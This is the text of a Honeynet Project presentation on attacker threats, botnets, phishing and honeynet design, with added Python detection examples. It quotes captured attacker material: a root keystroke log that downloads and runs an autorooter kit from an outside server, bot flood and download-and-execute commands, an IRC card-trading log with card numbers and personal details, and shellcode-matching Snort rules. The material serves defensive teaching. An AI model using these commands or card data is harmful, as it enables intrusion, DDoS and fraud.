Honeynets and
The Honeynet Project
Speaker




          2
              Purpose

To explain our organization, our value to
you, and our research.




                                            3
              Agenda
• The Honeynet Project and Research
  Alliance
• The Threat
• How Honeynets Work
• Learning More




                                      4
Honeynet Project




                   5
               Problem

How can we defend against an enemy, when
we don’t even know who the enemy is?




                                           6
      Mission Statement

To learn the tools, tactics, and motives
involved in computer and network
attacks, and share the lessons learned.




                                           7
                 Our Goal
Improve the security of the Internet at no cost to the
public.

• Awareness: Raise awareness of the threats
  that exist.
• Information: For those already aware, we teach
  and inform about the threats.
• Research: We give organizations the
  capabilities to learn more on their own.
                                                 8
              Honeynet Project
• Non-profit (501c3) organization with Board of
  Directors.
• Funded by sponsors
• Global set of diverse skills and experiences.
• Open Source, share all of our research and findings at
  no cost to the public.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have nothing to sell.

                                                     9
  Honeynet Research Alliance
Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying
honeypot technologies.



     http://www.honeynet.org/alliance/


                                               10
             Alliance Members
•   South Florida Honeynet Project
•   Georgia Technical Institute
•   Azusa Pacific University
•   USMA Honeynet Project
•   Pakistan Honeynet Project
•   Paladion Networks Honeynet Project (India)
•   Internet Systematics Lab Honeynet Project (Greece)
•   Honeynet.BR (Brazil)
•   UK Honeynet
•   French Honeynet Project
•   Italian Honeynet Project
•   Portugal Honeynet Project
•   German Honeynet Project
•   Spanish Honeynet Project
•   Singapore Honeynet Project
•   China Honeynet Project

The Threat




             12
       What we have captured

• The Honeynet Project has captured
  primarily external threats that focus on
  targets of opportunity.

• Little has yet been captured on advanced
  threats; few honeynets to date have been
  designed to capture them.


                                              13
                The Threat
• Hundreds of scans a day.
• Fastest manual compromise of a honeypot:
  15 minutes (by a worm: under 60 seconds).
• Life expectancies: a vulnerable Win32 system is
  under three hours, a vulnerable Linux system is
  three months.
• Primarily cyber-crime, focused on Win32 systems
  and their users.
• Attackers can control thousands of systems
  (botnets).
                                            14
The Threat




             15
              The Motive

• Motives vary, but we are seeing more and
  more criminally motivated.
• Several years ago, hackers hacked
  computers. Now, criminals hack
  computers.
• Fraud, extortion and identity theft have
  been around for centuries, the net just
  makes it easier.
                                             16
               DDoS for Money


J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline
      for this amount of time”
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not
      make money off of it?
J4ck: I know plenty of people that'd pay exorbatent
      amounts for packeting




                                                   17
                The Target

• The mass users.
• Tend to be non-security aware, making
  them easy targets.
• Economies of scale (it’s a global target).




                                               18
          Interesting Trends

• Attacks often originate from economically
  depressed countries (Romania is an
  example).
• Attacks shifting from the computer to the
  user (computers getting harder to hack).
• Attackers continue to get more
  sophisticated.


                                              19
                The Tools

• Attacks used to be primarily worms and
  autorooters.

• New advances include Botnets and
  Phishing.

• Tools are constantly advancing.

                                           20
                            The Old Days

Jan   8   18:48:12   HISTORY:   PID=1246   UID=0   lynx www.becys.org/LUCKROOT.TAR
Jan   8   18:48:31   HISTORY:   PID=1246   UID=0   y
Jan   8   18:48:45   HISTORY:   PID=1246   UID=0   tar -xvfz LUCKROOT.TAR
Jan   8   18:48:59   HISTORY:   PID=1246   UID=0   tar -xzvf Lu
Jan   8   18:49:01   HISTORY:   PID=1246   UID=0   tar -xzvf L
Jan   8   18:49:03   HISTORY:   PID=1246   UID=0   tar -xzvf LUCKROOT.TAR
Jan   8   18:49:06   HISTORY:   PID=1246   UID=0   cd luckroot
Jan   8   18:49:13   HISTORY:   PID=1246   UID=0   ./luckgo 216 210
Jan   8   18:51:07   HISTORY:   PID=1246   UID=0   ./luckgo 200 120
Jan   8   18:51:43   HISTORY:   PID=1246   UID=0   ./luckgo 64 120
Jan   8   18:52:00   HISTORY:   PID=1246   UID=0   ./luckgo 216 200
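One thing an analyst does with keystroke records like these is look for the fetch-unpack-run pattern automatically rather than reading every line. The Python below is an added example, not part of the original presentation or of any Honeynet Project tool: it parses the HISTORY lines shown above (embedded here as constructed sample input) and flags, per shell PID, a download tool followed by a tar extraction and the execution of a local binary by UID 0. The line format it expects and the set of download tools it recognises are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the slide's HISTORY keystroke log. The attacker
# is UID 0 and fetches, unpacks and runs a kit from an external web server.
SAMPLE_LOG = """\
Jan   8   18:48:12   HISTORY:   PID=1246   UID=0   lynx www.becys.org/LUCKROOT.TAR
Jan   8   18:48:31   HISTORY:   PID=1246   UID=0   y
Jan   8   18:48:45   HISTORY:   PID=1246   UID=0   tar -xvfz LUCKROOT.TAR
Jan   8   18:49:03   HISTORY:   PID=1246   UID=0   tar -xzvf LUCKROOT.TAR
Jan   8   18:49:06   HISTORY:   PID=1246   UID=0   cd luckroot
Jan   8   18:49:13   HISTORY:   PID=1246   UID=0   ./luckgo 216 210
Jan   8   18:51:07   HISTORY:   PID=1246   UID=0   ./luckgo 200 120
"""

# Assumed record layout: "<mon> <day> <hh:mm:ss> HISTORY: PID=<n> UID=<n> <command>"
LINE_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+HISTORY:\s+"
    r"PID=(?P<pid>\d+)\s+UID=(?P<uid>\d+)\s+(?P<cmd>.*)$"
)

# Programs treated as "download tools" (assumption; extend to taste).
DOWNLOADERS = {"lynx", "wget", "curl", "ftp", "tftp", "fetch"}


@dataclass
class Entry:
    time: str
    pid: int
    uid: int
    cmd: str


def parse(log):
    """Turn the raw HISTORY text into Entry records, skipping unparseable lines."""
    entries = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(Entry(m["time"], int(m["pid"]), int(m["uid"]), m["cmd"].strip()))
    return entries


def find_fetch_unpack_run(entries):
    """Per shell (PID), look for download tool -> tar extract -> execution of a
    local binary. Returns (pid, uid, downloaded_target, executed_cmd) tuples."""
    findings = []
    by_pid = {}
    for e in entries:
        by_pid.setdefault(e.pid, []).append(e)
    for pid, seq in by_pid.items():
        state, target = 0, None
        for e in seq:
            argv = e.cmd.split()
            if not argv:
                continue
            prog = argv[0]
            if state == 0 and prog in DOWNLOADERS and len(argv) > 1:
                state, target = 1, argv[1]          # something was fetched
            elif state == 1 and prog == "tar" and any(
                a.startswith("-") and "x" in a for a in argv[1:]
            ):
                state = 2                           # ...and extracted
            elif state == 2 and prog.startswith("./"):
                findings.append((pid, e.uid, target, e.cmd))  # ...and run
                break
    return findings


if __name__ == "__main__":
    for pid, uid, target, cmd in find_fetch_unpack_run(parse(SAMPLE_LOG)):
        print(f"PID {pid} (UID {uid}) fetched {target} and ran: {cmd}")
```

The state machine is deliberately per PID so that two interleaved attacker shells do not confuse each other; the same approach works for any keystroke source that carries a session identifier.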




                                                                            21
                 Botnets

• Large networks of hacked systems.
• Often thousands, if not tens of thousands,
  of hacked systems under the control of a
  single user.
• Automated commands used to control the
  ‘zombies’.



                                               22
              How They Work

• After successful exploitation, a bot uses TFTP,
  FTP, or HTTP to download itself to the
  compromised host.
• The binary is started and connects to the
  hard-coded master IRC server.
• Often a dynamic DNS name is provided rather
  than a hard-coded IP address, so the bot can be
  easily relocated.
• Using a specially crafted nickname like
  USA|743634, the bot joins the master's channel,
  sometimes using a password to keep strangers
  out of the channel.
              80% of traffic

•   Port 445/TCP
•   Port 139/TCP
•   Port 135/TCP
•   Port 137/UDP

• Infected systems most often WinXP-SP1
  and Win2000
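Because the bot behaviour described above is so regular (a fixed nick pattern, a keyed JOIN, status chatter in the channel), it stands out in the outbound IRC traffic a honeywall records. The Python below is an added example, not code from the presentation or from the Honeynet Project: it runs over a constructed log of client-to-server IRC lines (the USA|743634 nick is taken from the slide; the addresses, channel and other lines are made up) and scores each honeypot on three indicators. The record format, the nick regular expression and the "[SCAN]" marker are assumptions.

```python
import re

# Constructed sample of outbound IRC traffic, one client->server line per
# record: "<src_ip> <dst_ip>:<port> <IRC command> [args]". Only the nick
# USA|743634 comes from the slide; everything else is made up.
SAMPLE_IRC = """\
10.0.0.5 203.0.113.7:6667 NICK USA|743634
10.0.0.5 203.0.113.7:6667 USER xp 0 0 :xp
10.0.0.5 203.0.113.7:6667 JOIN #upd4te s3cr3t
10.0.0.9 198.51.100.2:6667 NICK dave
10.0.0.9 198.51.100.2:6667 JOIN #linux
10.0.0.5 203.0.113.7:6667 PRIVMSG #upd4te :[SCAN]: Random Port Scan started on 10.0.x.x:445
"""

# Assumed nick pattern for this bot family: COUNTRY|DIGITS (also - or _ as separator).
BOT_NICK_RE = re.compile(r"^[A-Z]{2,4}[|\-_]\d{4,}$")
REC_RE = re.compile(r"^(?P<src>\S+)\s+(?P<dst>\S+):(?P<port>\d+)\s+(?P<cmd>\S+)\s*(?P<args>.*)$")


def analyze_irc(log):
    """Collect, per source host: bot-like nick, channels joined with a key,
    number of scan status messages, and the IRC servers contacted."""
    findings = {}
    for line in log.splitlines():
        m = REC_RE.match(line)
        if not m:
            continue
        src, cmd, args = m["src"], m["cmd"].upper(), m["args"]
        f = findings.setdefault(
            src, {"bot_nick": None, "keyed_joins": [], "scan_reports": 0, "servers": set()}
        )
        f["servers"].add(f"{m['dst']}:{m['port']}")
        if cmd == "NICK" and BOT_NICK_RE.match(args.strip()):
            f["bot_nick"] = args.strip()
        elif cmd == "JOIN":
            parts = args.split()
            if len(parts) >= 2:          # JOIN <channel> <key>: password-protected channel
                f["keyed_joins"].append(parts[0])
        elif cmd == "PRIVMSG" and "[SCAN]" in args:
            f["scan_reports"] += 1        # bot reporting scanner status to its master
    return findings


def suspicious_hosts(findings):
    """Flag a host when it uses a bot-style nick plus at least one more indicator."""
    out = []
    for src, f in findings.items():
        score = sum([f["bot_nick"] is not None, bool(f["keyed_joins"]), f["scan_reports"] > 0])
        if f["bot_nick"] is not None and score >= 2:
            out.append(src)
    return sorted(out)


if __name__ == "__main__":
    found = analyze_irc(SAMPLE_IRC)
    for host in suspicious_hosts(found):
        print(host, found[host])
```

Requiring the nick match plus a second indicator keeps an ordinary user with an odd nickname (10.0.0.9 above) from being flagged; in a real honeynet the servers set is the list you would feed to the data-control layer.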

                                          24
                                      Bots
ddos.synflood [host] [time] [delay] [port]
starts an SYN flood

ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts a HTTP flood

scan.listnetranges
list scanned netranges

scan.start
starts all enabled scanners

scan.stop
stops all scanners

http.download
download a file via HTTP

http.execute
updates the bot via the given HTTP URL

http.update
executes a file from a given HTTP URL

cvar.set spam_aol_channel [channel]
AOL Spam - Channel name

cvar.set spam_aol_enabled [1/0]
AOL Spam - Enabled?
               Numbers

• Over a 4-month period:
  • More than 100 botnets were tracked.
  • One channel had over 200,000 IP
    addresses.
  • One computer was compromised by 16
    bots.
  • Estimated over 1 million systems
    compromised.


                                         26
          Botnet Economy

• Botnets are sold or rented out.
• Saw botnets being stolen from one another.
• Observed harvesting of information from
  all compromised machines. For example,
  the operator of the botnet can request a
  list of CD-keys (e.g. for Windows or
  games) from all bots. These CD-keys can
  be sold or used for other purposes since
  they are considered valuable information.
                                              27
                   Phishing

• Social-engineer victims into giving up valuable
  information (login, password, credit card number,
  etc.).

• Easier to hack the user than the computer.

• Need attacks against instant messaging.

            http://www.antiphishing.org

                                                      28
The Sting




            29
Getting the Info




                   30
             Infrastructure

• Attackers build networks of thousands of
  hacked systems (often botnets).
• Upload pre-made packages for phishing.
• Use platforms for sending out spoofed
  email.
• Use platforms for false websites.



                                            31
                     A Phishing Rootkit
-rw-r--r--   1   free   web   14834 Jun 17 13:16 ebay only
-rw-r--r--   1   free   web   247127 Jun 14 19:58 emailer2.zip
-rw-r--r--   1   free   web   7517 Jun 11 11:53 html1.zip
-rw-r--r--   1   free   web   10383 Jul 3 19:07 index.html
-rw-r--r--   1   free   web   413 Jul 18 22:09 index.zip
-rw-r--r--   1   free   web   246920 Jun 14 20:38 massmail.tgz
-rw-r--r--   1   free   web   8192 Jun 12 07:18 massmail.zip
-rw-r--r--   1   free   web   12163 Jun 9 01:31 send.php
-rw-r--r--   1   free   web   2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--   1   free   web   2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--   1   free   web   2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--   1   free   web   2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--   1   free   web   1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--   1   free   web   2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--   1   free   web   83862 Jun 9 09:56 spamz.zip
-rw-r--r--   1   free   web   36441 Jul 18 00:52 usNEW.zip
-rw-r--r--   1   free   web   36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x   2   free   web   49 Jul 16 12:26 banka
-rw-r--r--   1   free   web   301939 Jun 8 13:17 www1.tar.gz
-rw-r--r--   1   free   web   327380 Jun 7 16:24 www1.zip


                                                                          32
             Credit Cards Exchanging

04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box
126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All
This ccs update everyday From My Hacked shopping Database - You must
regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard
(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS
Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :
*** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :
9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)




                                                                          33
                The Future

• Hacking is profitable, and it is difficult to get
  caught.

• Expect more attacks to focus on the end
  user or the client.

• Expect things to get worse; the bad guys
  adapt faster.
                                               34
Honeynets




            35
                   Honeypots
• A honeypot is an information system resource
  whose value lies in unauthorized or illicit use of
  that resource.

• Has no production value, anything going to or from
  a honeypot is likely a probe, attack or compromise.

• Primary value to most organizations is information.


                                                       36
                 Advantages

•   Collect small data sets of high value.
•   Reduce false positives
•   Catch new attacks, false negatives
•   Work in encrypted or IPv6 environments
•   Simple concept requiring minimal resources.



                                              37
            Disadvantages

• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)




                                             38
                     Types

• Low-interaction
  • Emulates services, applications, and OS’s.
  • Low risk and easy to deploy/maintain, but
    capture limited information.

• High-interaction
  • Real services, applications, and OS’s
  • Capture extensive information, but high
    risk and time intensive to maintain.
                                                 39
         Examples of Honeypots

Low Interaction

•   BackOfficer Friendly
•   KFSensor
•   Honeyd

High Interaction

•   Honeynets
                                              40
                Honeynets

• High-interaction honeypot designed to capture
  in-depth information.
• Information has different value to different
  organizations.
• It's an architecture you populate with live
  systems, not a product or software.
• Any traffic entering or leaving is suspect.

                                            41
             How it works

A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.

• Data Control
• Data Capture
• Data Analysis

    http://www.honeynet.org/papers/honeynet/
                                               42
Honeynet Architecture




                        43
              Data Control

• Mitigate risk of honeynet being used to
  harm non-honeynet systems.

• Count outbound connections.
• IPS (Snort-Inline)
• Bandwidth Throttling*
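To make "count outbound connections" concrete, here is an added Python model of the data-control limit. It is not the Honeywall's own implementation (the CDROM enforces this in its firewall rules) but a stand-alone simulation written for this page. It assumes a one-hour sliding window with per-protocol limits named after the HwTCPRATE variable the deck mentions later (TCP = 30 as in the hwctl example; the UDP, ICMP and "other" values are invented) and replays constructed connection events from one honeypot, showing the point at which further outbound connections are dropped.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical per-protocol limits per honeypot per hour. TCP=30 mirrors the
# deck's "hwctl HwTCPRATE=30"; the other figures are assumptions for the model.
LIMITS = {"tcp": 30, "udp": 20, "icmp": 50, "other": 10}
WINDOW = timedelta(hours=1)


class OutboundLimiter:
    """Counts new outbound connections per (honeypot, protocol) inside a sliding
    window and decides whether each new connection may leave the honeynet."""

    def __init__(self, limits=LIMITS, window=WINDOW):
        self.limits = limits
        self.window = window
        self.history = defaultdict(list)   # (honeypot, proto) -> timestamps allowed
        self.dropped = defaultdict(int)    # (honeypot, proto) -> connections refused

    def allow(self, honeypot, proto, when):
        limit = self.limits.get(proto, self.limits.get("other", 0))
        key = (honeypot, proto)
        # Forget connections that have aged out of the window.
        recent = [t for t in self.history[key] if when - t < self.window]
        if len(recent) >= limit:
            self.history[key] = recent
            self.dropped[key] += 1
            return False
        recent.append(when)
        self.history[key] = recent
        return True


def replay(events, limiter=None):
    """events: iterable of (timestamp, honeypot, proto, dst).
    Returns (allowed, dropped) lists of the same tuples."""
    limiter = limiter or OutboundLimiter()
    allowed, dropped = [], []
    for when, hp, proto, dst in events:
        (allowed if limiter.allow(hp, proto, when) else dropped).append((when, hp, proto, dst))
    return allowed, dropped


def constructed_events():
    """Constructed data: a compromised honeypot opening 40 TCP connections in ten
    minutes (what a scan or flood looks like from the wall), then one more two
    hours later after the window has slid past the burst."""
    t0 = datetime(2005, 6, 1, 12, 0, 0)
    evs = [(t0 + timedelta(seconds=15 * i), "honeypot-1", "tcp", f"192.0.2.{i}") for i in range(40)]
    evs.append((t0 + timedelta(hours=2), "honeypot-1", "tcp", "192.0.2.99"))
    return evs


if __name__ == "__main__":
    ok, no = replay(constructed_events())
    print(f"allowed {len(ok)}, dropped {len(no)}; first drop -> {no[0][3] if no else None}")
```

The limiter only counts: a real honeywall pairs it with an IPS (the Snort-Inline rules on the next slides) and throttling, because thirty outbound connections is still enough to hurt a third party if each one carries an exploit.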


                                            44
No Data Control




                  45
Data Control




               46
             Snort-Inline


alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named"; flags:A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";)


alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named"; flags:A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
replace:"|0000 E8D7 FFFFFF|/ben/sh";)

The first rule only alerts; the second, with Snort-Inline's
replace keyword, also rewrites the matched bytes in the
passing packet so the exploit fails.
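The two rules differ only in the replace keyword, and the property that makes replace usable inline is that the substitute is exactly as long as the matched content, so the packet length, TCP sequence numbers and stream reassembly are unaffected. The Python below is an added example, not Snort code: it parses the slide's content and replace strings in Snort's |hex| notation, applies the substitution to a constructed payload, and refuses a replacement of a different length. The payload and the helper names are assumptions.

```python
def parse_content(spec):
    """Convert a Snort content/replace string into bytes: text between pipes
    is hex, everything outside the pipes is literal (latin-1) text."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:                      # inside |...|
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)


# Both strings are copied from the slide's Snort-Inline rule.
CONTENT = parse_content("|CD80 E8D7 FFFFFF|/bin/sh")
REPLACE = parse_content("|0000 E8D7 FFFFFF|/ben/sh")


def apply_replace(payload, content=CONTENT, replace=REPLACE):
    """Model of the replace keyword: if content occurs in the payload, swap in
    replace at that position. Length is preserved, so the packet stays valid.
    Returns (new_payload, matched)."""
    if len(content) != len(replace):
        raise ValueError("replace must be the same length as content")
    idx = payload.find(content)
    if idx < 0:
        return payload, False
    return payload[:idx] + replace + payload[idx + len(content):], True


# Constructed payload: filler bytes, then the sequence the rule looks for, then
# more filler. Only the middle 14 bytes come from the rule on the slide.
SAMPLE_PAYLOAD = b"\x90" * 8 + CONTENT + b"\x00" * 4


if __name__ == "__main__":
    new, hit = apply_replace(SAMPLE_PAYLOAD)
    print("matched:", hit, "length unchanged:", len(new) == len(SAMPLE_PAYLOAD))
    print(new.hex())
```

Zeroing the first two bytes and changing the path means the delivered code no longer executes as intended, while the connection itself continues; the attacker sees a failed exploit rather than a dropped session, which is exactly the behaviour a honeynet wants.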



                                              47
               Data Capture

• Capture all activity at a variety of levels.

• Network activity.
• Application activity.
• System activity.




                                                 48
                   Sebek

• Hidden kernel module that captures all
  host activity.
• Dumps activity to the network.
• The attacker cannot sniff this traffic: the
  module hides packets matching Sebek's magic
  number and destination port.




                                               49
Sebek Architecture




                     50
          Honeywall CDROM

• Attempt to combine all requirements of a
  Honeywall onto a single, bootable
  CDROM.

• May, 2003 - Released Eeyore
• May, 2005 - Released Roo



                                             51
          Eeyore Problems

• OS too minimized, almost crippled. Could
  not easily add functionality.
• Difficult to modify since LiveCD.
• Limited distributed capabilities
• No GUI administration
• No Data Analysis
• No international or SCSI support

                                             52
      Roo Honeywall CDROM

• Based on Fedora Core 3
• Vastly improved hardware and
  international support.
• Automated, headless installation
• New Walleye interface for web based
  administration and data analysis.
• Automated system updating.

                                        53
                Installation

• Just insert CDROM and boot, it installs to
  local hard drive.
• After it reboots for the first time, it runs a
  hardening script based on NIST and CIS
  security standards.
• Following installation, you get a command
  prompt and system is ready to configure.


                                                   54
First Boot




             55
Install




          56
Configure




            57
      3 Methods to Maintain

• Command Line Interface
• Dialog Interface
• Web GUI (Walleye)




                              58
     Command Line Interface

• Local or SSH access only.
• Use the utility hwctl to modify
  configurations and restart services.

     # hwctl HwTCPRATE=30



                                         59
Dialog Menu




              60
Data Administration




                      61
             Data Analysis

• Most critical part, the purpose of a
  honeynet is to gather information and
  learn.
• Need a method to analyze all the different
  elements of information.
• Walleye is the new solution, comes with
  the CDROM.


                                               62
Walleye




          63
Data Analysis




                64
Data Analysis Flows




                      65
Data Analysis Details




                        66
Processes




            67
Files




        68
Distributed Capabilities




                           69
                  Issues
• Require extensive resources to properly
  maintain.
• Detection and anti-honeynet technologies
  have been introduced.
• Can be used to attack or harm other non-
  Honeynet systems.
• Privacy can be a potential issue.


                                             70
    Legal Contact for .mil / .gov
Department of Justice; Computer Crime and
 Intellectual Property Section.

  • Paul Ohm
     • Number: (202) 514.1026
     • E-Mail: paul.ohm@usdoj.gov




                                            71
Learning More




                72
             Our Website
• Know Your Enemy papers.
• Scan of the Month Challenges
• Latest Tools and Technologies

          http://www.honeynet.org/




                                     73
Our Book




  http://www.honeynet.org/book




                          74
Sponsoring




     Advanced Network Management Lab




YOU?
                                       75
           How to Sponsor

• Sponsor development of a new tool
• Sponsor authorship of a new research
  paper.
• Sponsor research and development.

• Buy our book

             <project@honeynet.org>
          http://www.honeynet.org/funds/
                                           76
               Conclusion

The Honeynet Project is a non-profit, research
organization improving the security of the
Internet at no cost to the public by providing
tools and information on cyber security threats.




                                             77
http://www.honeynet.org
    <project@honeynet.org>




                             78

				